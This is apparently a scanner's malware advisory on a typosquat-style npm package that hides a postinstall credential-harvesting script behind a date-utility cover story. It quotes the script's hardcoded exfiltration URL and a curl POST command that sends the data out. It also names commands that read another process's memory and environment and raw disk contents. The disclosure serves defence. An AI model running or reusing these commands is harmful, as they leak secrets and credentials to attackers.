react-simple-utils-kit @1.4.2

Summary

Package advertises itself as 'a simple date formatting utility for React projects' (3-function index.js), but ships a postinstall.js that runs on every npm install and performs an extensive reconnaissance + credential-harvest sweep against the installer's host, POSTing each result over plain HTTP to a hardcoded attacker endpoint at http://2e3bkumw.requestrepo.com (a one-shot request-interception domain unrelated to any legitimate publisher). postinstall.js:8 hardcodes const BURL = 'http://2e3bkumw.requestrepo.com' and postinstall.js:16 invokes execSync(\ curl -s -m 8 -X POST -d @${tmpFile} ${BURL}/${key}...\ ) to ship results. Collected data includes: process capabilities and ptrace scope, strace attach against PID 2, raw memory reads of another process via xxd /proc/2/mem , that process's environment block via cat /proc/2/environ (commonly containing CI tokens and cloud credentials), /proc/2/cmdline , ps aux , listening-port enumeration, MCP probing on localhost:9000, and raw-disk reads from /dev/vdb . The package's name targets React developers via a date-utility cover story (empty author field, Chinese comment 绕过能力探测 = 'capability-detection bypass'); none of this behavior is consistent with the advertised purpose. Installer harm is concrete and immediate: any host running npm install react-simple-utils-kit leaks process-tree secrets, environment variables of other running processes, kernel/container introspection data, and raw block-device contents to attacker infrastructure.

Source: amazon-inspector (038aa6bccd8008fec1f309d718e53dd4b89e4ca15a976c6a80652e0dd58a5b58)